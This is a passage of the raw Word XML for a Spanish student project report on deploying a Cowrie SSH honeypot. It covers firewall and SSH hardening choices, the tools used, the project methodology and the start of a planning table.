      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables y netfilter-persistent: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables es la herramienta que gestiona las reglas de netfilter, el sistema de filtrado de paquetes del kernel Linux. En este proyecto cumple dos funciones: en la tabla filter mantiene un «rechazar todo» en la cadena INPUT con excepciones solo para los puertos necesarios, y en la tabla nat una regla PREROUTING redirige el tráfico destinado al puerto 22 hacia el 2222, donde escucha Cowrie, de forma transparente para el atacante. El paquete netfilter-persistent guarda las reglas en /etc/iptables/rules.v4 para que se restauren en cada arranque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenSSH: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">servidor SSH real para la administración segura del servidor, configurado en el puerto no estándar 2022. Se deshabilita la autenticación por contraseña y el login root, aceptando únicamente claves ed25519. Esta configuración sigue las buenas prácticas de hardening de SSH recogidas en los benchmarks de CIS (Center for Internet Security).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Decisión de Diseño: iptables en Lugar de UFW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La planificación inicial del proyecto contemplaba UFW (Uncomplicated Firewall) como firewall del host, por ser la herramienta habitual en Ubuntu y por su sintaxis sencilla. UFW no es un firewall distinto, sino una capa de gestión que genera reglas de iptables. Durante la preparación del despliegue, entonces previsto en Oracle Cloud, se analizó la imagen de Ubuntu de esa plataforma y se decidió prescindir de UFW por tres motivos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">En primer lugar, la imagen de Oracle ya incluye un conjunto de reglas de iptables persistentes en /etc/iptables/rules.v4, que terminan con un rechazo general del tráfico entrante e incluyen reglas para los servicios internos de la plataforma en el rango 169.254.0.0/16. Activar UFW sobre esa base supondría tener dos gestores escribiendo en las mismas tablas, una fuente habitual de errores difíciles de diagnosticar, como abrir un puerto en UFW y que el tráfico siga bloqueado por una regla previa de Oracle. En el despliegue final en Hetzner la imagen no trae reglas previas, pero sí UFW instalado e inactivo; al instalar iptables-persistent, el gestor de paquetes desinstaló UFW automáticamente por ser incompatibles, lo que confirma que ambas herramientas no deben convivir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">En segundo lugar, la redirección del puerto 22 al 2222 requiere una regla en la tabla nat que UFW no permite crear con sus comandos; obliga a editar a mano su fichero /etc/ufw/before.rules. Con iptables es una única regla. Por último, mantener todas las reglas, de filtrado y de NAT, en una sola herramienta simplifica la auditoría: el comando iptables -S muestra la configuración completa y activa del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Un detalle de esta configuración es que el firewall del host debe aceptar el puerto 2222 aunque no se exponga a Internet. La redirección se aplica en la cadena PREROUTING, antes del filtrado, de modo que el paquete llega a la cadena INPUT con el puerto de destino ya cambiado a 2222. El puerto sigue siendo inaccesible desde el exterior porque el Cloud Firewall de Hetzner solo admite el 22 y el 2022.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Herramientas de Desarrollo y Documentación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Git / GitHub: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sistema de control de versiones distribuido utilizado para gestionar el código fuente, los scripts y la documentación del proyecto. El repositorio público (github.com/diegofonterosa/PFC-Cowrie) incluye historial de commits descriptivos, fichero README.md y estructura organizada de directorios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualBox 7.x: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">hipervisor de tipo 2 (hosted) de Oracle, utilizado para ejecutar las máquinas virtuales del laboratorio local. Proporciona el aislamiento necesario para analizar datos potencialmente maliciosos sin riesgo para el equipo anfitrión.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">distribución Linux basada en Debian orientada a pruebas de seguridad y pentesting. Se utiliza en este proyecto para realizar ataques controlados contra el honeypot (herramientas como hydra, nmap, ssh) y verificar que Cowrie responde correctamente y genera los logs esperados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">matplotlib: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">biblioteca Python para la generación de gráficas estáticas, animadas e interactivas. En este proyecto se utiliza para producir gráficas de barras horizontales con los rankings de IPs, contraseñas, usuarios y comandos, exportadas como ficheros PNG de alta resolución.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ip-api.com: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">API REST gratuita de geolocalización de IPs que devuelve país, ciudad, ISP y coordenadas geográficas para una dirección IP dada. Se consulta en el script de análisis para enriquecer los datos de las IPs atacantes con información geográfica. El tier gratuito permite 45 consultas por minuto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Metodología</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Metodología Utilizada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El proyecto sigue una metodología iterativa e incremental, dividida en ocho fases secuenciales con hitos de control intermedios. Esta aproximación permite avanzar de forma progresiva, validando cada componente antes de construir sobre él. La naturaleza del proyecto —un sistema que debe estar expuesto a Internet para recopilar datos reales— impone una secuencia lógica estricta: primero el despliegue de la infraestructura, después la configuración del honeypot, a continuación la captura de datos durante un período suficiente y finalmente el análisis y la generación del informe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta secuencialidad es inherente al dominio: no se pueden analizar ataques que aún no se han capturado, y no se pueden capturar ataques en un honeypot que aún no se ha desplegado. Sin embargo, dentro de cada fase se permite la iteración: por ejemplo, la configuración de Cowrie puede ajustarse tras observar los primeros ataques, y el script de análisis puede refinarse a medida que se identifican nuevos patrones en los datos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cada fase incluye un conjunto de tareas con estimación de horas y un criterio de prueba asociado (estructura RFTP), lo que permite contrastar la planificación inicial con el tiempo real dedicado al finalizar el proyecto. Los hitos de control permiten verificar el avance: el hito del 50% (9 de octubre) coincide con la finalización del despliegue y hardening, mientras que la entrega final se sitúa el 14 de diciembre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Se ha optado por no utilizar un framework de gestión ágil formal (Scrum, Kanban) al tratarse de un proyecto individual donde la planificación secuencial resulta más natural y eficiente. El seguimiento se realiza mediante el propio repositorio Git, que documenta el progreso a través de los commits, y la tabla RFTP que actúa como checklist de verificación.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Planificación Temporal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El proyecto se desarrolla entre septiembre y diciembre de 2026, con un total estimado de 109 horas distribuidas en las siguientes fases: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794"/>
        <w:gridCol w:w="2620"/>
        <w:gridCol w:w="2381"/>
        <w:gridCol w:w="794"/>
        <w:gridCol w:w="1349"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="500"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Periodo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="500"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Horas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Estado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Planificación y documentación inicial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">15 sept – 30 sept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Completada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Despliegue del servidor cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1 oct – 7 oct</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Completada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardening del servidor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">7 oct – 10 oct</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
